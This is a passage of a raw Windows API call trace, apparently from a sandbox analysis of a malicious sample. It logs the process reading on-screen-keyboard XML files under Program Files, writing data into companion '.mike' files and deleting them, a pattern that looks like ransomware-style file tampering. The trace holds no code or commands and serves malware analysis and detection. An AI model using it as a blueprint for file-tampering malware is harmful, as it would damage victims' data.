lpFilePart=0x0) returned 0x4e [0045.388] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", lpFilePart=0x0) returned 0x4e [0045.388] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", lpFilePart=0x0) returned 0x4e [0045.388] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0045.388] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0045.403] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", lpFilePart=0x0) returned 0x4e [0045.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0045.403] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.404] GetFileType (hFile=0x264) returned 0x1 [0045.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0045.404] GetFileType (hFile=0x264) returned 0x1 [0045.404] CloseHandle (hObject=0x264) returned 1 [0045.404] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", lpFilePart=0x0) returned 0x4e [0045.404] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", lpFilePart=0x0) returned 0x4e [0045.404] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0045.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0045.404] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0045.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0045.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.404] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), fInfoLevelId=0x0, lpFileInformation=0x210468c | out: lpFileInformation=0x210468c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdb3fc5, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fdb3fc5, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fdb3fc5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xdb)) returned 1 [0045.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.404] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", lpFilePart=0x0) returned 0x4e [0045.405] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.405] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), fInfoLevelId=0x0, lpFileInformation=0x21049c8 | out: lpFileInformation=0x21049c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdb3fc5, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fdb3fc5, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fdb3fc5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xdb)) returned 1 [0045.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.405] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", lpFilePart=0x0) returned 0x4e [0045.405] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike", lpFilePart=0x0) returned 0x53 [0045.405] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.405] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.405] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", lpFilePart=0x0) returned 0x4e [0045.405] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", lpFilePart=0x0) returned 0x4e [0045.405] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", lpFilePart=0x0) returned 0x4e [0045.405] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike", lpFilePart=0x0) returned 0x53 [0045.405] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0045.405] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0045.406] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike", lpFilePart=0x0) returned 0x53 [0045.406] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0045.406] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.406] GetFileType (hFile=0x264) returned 0x1 [0045.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0045.406] GetFileType (hFile=0x264) returned 0x1 [0045.406] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0045.406] WriteFile (in: hFile=0x264, lpBuffer=0x2105914*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2105914*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0045.407] CloseHandle (hObject=0x264) returned 1 [0045.407] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0045.407] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), fInfoLevelId=0x0, lpFileInformation=0x21053e8 | out: lpFileInformation=0x21053e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdb3fc5, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fdb3fc5, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fdb3fc5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xdb)) returned 1 [0045.407] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0045.407] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", lpFilePart=0x0) returned 0x4e [0045.407] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0045.407] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.407] GetFileType (hFile=0x264) returned 0x1 [0045.408] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0045.408] GetFileType (hFile=0x264) returned 0x1 [0045.408] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0045.408] ReadFile (in: hFile=0x264, lpBuffer=0x2106a50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2106a50*, lpNumberOfBytesRead=0x2af080*=0xdb, lpOverlapped=0x0) returned 1 [0045.409] CloseHandle (hObject=0x264) returned 1 [0045.409] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike", lpFilePart=0x0) returned 0x53 [0045.409] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0045.409] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.409] GetFileType (hFile=0x264) returned 0x1 [0045.409] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0045.409] GetFileType (hFile=0x264) returned 0x1 [0045.409] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0045.409] WriteFile (in: hFile=0x264, lpBuffer=0x2109cb8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2109cb8*, lpNumberOfBytesWritten=0x2af074*=0xe0, lpOverlapped=0x0) returned 1 [0045.410] CloseHandle (hObject=0x264) returned 1 [0045.411] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike", lpFilePart=0x0) returned 0x53 [0045.411] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0045.411] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.411] GetFileType (hFile=0x264) returned 0x1 [0045.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0045.411] GetFileType (hFile=0x264) returned 0x1 [0045.412] WriteFile (in: hFile=0x264, lpBuffer=0x210cef4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x210cef4*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0045.412] CloseHandle (hObject=0x264) returned 1 [0045.413] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", lpFilePart=0x0) returned 0x4e [0045.413] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike", lpFilePart=0x0) returned 0x53 [0045.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.413] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5448140, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5448140, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5448140, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x300)) returned 1 [0045.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.413] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", lpFilePart=0x0) returned 0x4e [0045.413] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike", lpFilePart=0x0) returned 0x53 [0045.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.413] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x210e6cc | out: lpFileInformation=0x210e6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5448140, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5448140, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5448140, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x300)) returned 1 [0045.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.413] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", lpFilePart=0x0) returned 0x4e [0045.413] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", dwFileAttributes=0x80) returned 0 [0045.414] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", lpFilePart=0x0) returned 0x4e [0045.415] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike", lpFilePart=0x0) returned 0x53 [0045.415] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0045.415] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5448140, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5448140, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5448140, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x300)) returned 1 [0045.415] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0045.415] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", lpFilePart=0x0) returned 0x4e [0045.415] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike", lpFilePart=0x0) returned 0x53 [0045.415] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.mike")) returned 1 [0045.416] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", lpFilePart=0x0) returned 0x4c [0045.416] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", lpFilePart=0x0) returned 0x4c [0045.416] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", lpFilePart=0x0) returned 0x4c [0045.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0045.416] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0045.417] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", lpFilePart=0x0) returned 0x4c [0045.417] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0045.417] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.418] GetFileType (hFile=0x264) returned 0x1 [0045.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0045.418] GetFileType (hFile=0x264) returned 0x1 [0045.418] CloseHandle (hObject=0x264) returned 1 [0045.418] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", lpFilePart=0x0) returned 0x4c [0045.418] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", lpFilePart=0x0) returned 0x4c [0045.418] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0045.418] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0045.418] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0045.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0045.418] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.418] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), fInfoLevelId=0x0, lpFileInformation=0x2110880 | out: lpFileInformation=0x2110880*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe00281, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe00281, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe00281, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd7)) returned 1 [0045.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.418] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", lpFilePart=0x0) returned 0x4c [0045.418] 